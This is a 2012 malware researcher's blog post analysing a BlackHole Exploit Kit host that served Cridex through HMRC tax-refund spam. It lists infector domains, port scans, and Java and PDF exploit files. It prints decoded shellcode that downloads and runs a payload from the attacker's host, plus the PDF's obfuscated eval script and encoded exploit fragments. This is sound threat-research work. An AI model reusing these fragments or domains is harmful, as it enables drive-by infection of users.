Tuesday, September 18, 2012

Monitoring a BlackHole Exploit Kit Services & Infectors (Target: 203.91.113.6)

Monitoring the activity of one blackhole (in short: BHEK) host means spending time on it for days. I picked one positive BHEK host in 203.91.113.6 & stick to it for about a week, this host is quite active as malware infectors, which one of the reason I picked it up.
I think I am careful enough in monitoring it, so I don't think they don't even sense to be monitored, which giving me much time to analyze it. Here's of what I found...
  
Background

The spam email contains malicious link to this host on Sept 5th was -
making me start to monitor this host. Maybe some of you still remember -
this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
↑This spam actually infected users w/Cridex. At that time the domain used was gdeounitrg.com and gsigallery.net URLQuery data is also showing a long list of reported malware infectors coming from this host, you can access it here--->>[CLICK] By that list ↑we can see the recent infector domain as per below↓
virtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net
If you see each report listed in↑URLQuery by date, you will know this host never use same domain more than 2 days(MAX). Since the url listed are landing page, I can assume email malvertising scheme. Services used: During the initial monitoring time I detected services as per below:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
Couple days ago I realized it filtered their previously opened ports /services, and added some more too, which looks like this now:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
Legend:
= Windows services, it was never filtered previously
= nessus scanner daemon service
= squid proxy is running
= http web server
↑It filtered some tcp ports related to the windows services. To make sure this is still the same Windows server as before - I re-checked the OS fingerprint of it everyday:
Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
What's with the web services used (port 80 and 8080) Let's see what happened in port 8080
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happened in port 80
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
↑So in TCP/8080 we'll see a tomcat & ngnix in TCP/80. Now we see ngnix, apache, file sharing, telnet, ssh, and ftp server. The filtered ports are: nessus for portscanning, and squid proxy which I probed to be set outbound. I saw some of blackhole hosts, but never see a guarded one w/heavy services running like this, morever NFS & LDAP services are also running too which suggesting us a possibility of records or maybe a C&C activity on it. OK, let's continue with what this BHEK actually does now.. Infector scheme and malwares Consulting to my EK mentor @kafein who kindly guide me in EK infection cases, what looked like old version of BHEK (1.2.5), since there are some changes - it's possible being upgraded to lastest BHEK v2, so I use a tool on freebsd box to check the infector scheme. We picked the latest infector structure from urlQuery:
virtual-geocaching.net/main.php?page=7de3f5c4200c896e
..And this is what I fetched as samples: ↑all of these evil-mess is what user will get by clicking one infector url above. File details are as follows:
AcroPDF.PDF                    50583375d345fb7a294e26094601699a   18406
field.swf                      d41d8cd98f00b204e9800998ecf8427e       0
Gam.jar                        ab4af9072132f170024a9072e0288459   32171
main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3   69023
shellcode.sc                   ac157a90724aec74a1de6e0a20d4db0d     466
wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9  119143
While these are coming through below redirected urls of the infector:
/main.php?page=7de3f5c4200c896e <--JS/Obfs Infector
/Gam.jar   <----- exploit java CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php  <----PDF Malware Pdfka/EXP will shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode)
/w.php?f=80f39&e=2 <-----payload EXE (troj/CRIDEX dropped by PDF)
/data/hhcp.php?c=80f39  <----0 byte (link for SWF)
/data/field.swf <-- 0 byte supposed to be flash/shockwave
/w.php?f=80f39&e=4 <--- url dropped to PDF shellcode
↑The point of this scheme is to infect user with Trojan/Cridex The infector scheme is like follows: Landing page is HTML contains obfuscated JS/Code, neutralizedsample is here---->>[PASTEBIN] This code is deobfs'ed like this ---->>[PASTEBIN] There you can see the BHEK plugin detection code to exploit your browser via vulnerable sector, as per below route:
Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in log at my freebsd box below:
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)



[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlh00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10


Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)






ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)



[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
About #shellcode, we found 2 shellcodes, one is the one coded in the landing page, and the other one is coded in PDF file, say, shellcode 1 & 2. The shellcode1 decoded:
BOOL VirtualProtectEx (
     HANDLE = 0x298dda60 => none;
     LPCVOID = 0x298dda70 => none;
     DWORD dwSize = 255;
     DWORD flNewProtect = 64;
     PDWORD lpflOldProtectt = 64;
) =  0x1;
HMODULE LoadLibraryA (
     LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dl used
) =  0x7df20000;
DWORD GetTempPathA (
     DWORD nBufferLength = 248;
     LPTSTR = 0x298ddb00 => 
           = "c:\tmp\";
) =  0x7;
HRESULT URLDownloadToFile ( //downloads...
     LPUNKNOWN = 0x28621a40 =>  none;
     LPCTSTR = 0x28621a48 => 
           = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
     LPCTSTR = 0x298ddb50 => 
           = "c:\tmp\wpbt0.dll";  // saved here...
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0x0;
UINT WINAPI WinExec (       // execute it here..
     LPCSTR = 0x298ddb70 => 
           = "c:\tmp\wpbt0.dll";
     UINT uCmdShow = 0;
) =  0x20;
UINT WINAPI WinExec (
     LPCSTR = 0x298ddbb0 => 
           = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
     UINT uCmdShow = 0;
) =  0x20;
BOOL TerminateThread (
     HANDLE hThread = -2;    // exit...
     DWORD dwExitCode = 0;
) =  0x0;
While the other one shellcode 2 is so similar to it with aiming different download url:
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"
For PDF infector, Most scanner cannot detect below evil script written in it:
<xfa:script contentType='application/x-javascript'>
with(event){
e=target["eval"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){
zz=i;
}
for(i=0;i<zz;i++){
 s+=String.fromCharCode(-33+1*z[i]);
}
e(""+s);
</xfa:script>
↑While the Subject object contains exploit & shellcode:
<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
  :
snip
  :
CreationDate(66;83;e4;fc;fc;85;e4; //shelcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
The payload itself is the PE file of Trojan/Cridex , which has the below analysis:
Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed:  0 Actual:  130407
Packer: PureBasic 4.x -> Neil Hodgson 
Sections:
   .code 0x1000 0x24cf 9728
   .text 0x4000 0x23c8 9216
   .rdata 0x7000 0x10 512 
   .data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\​System\​CurrentControlSet\​Control\​Terminal Server (TSUserEnabled )

At the time I got this only 3 AV products detected it:
Symantec                 : W32.Cridex
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Downloader.A
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
I uploaded samples to Virus Total to check/monitor RECENT detection ratio:
So the moral of the story is : With BHEK infector domains lasts max up to 2days, with landing pages changes per one click on the BHEK2 and hourly on previous version, while they started using network tools for protection & C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!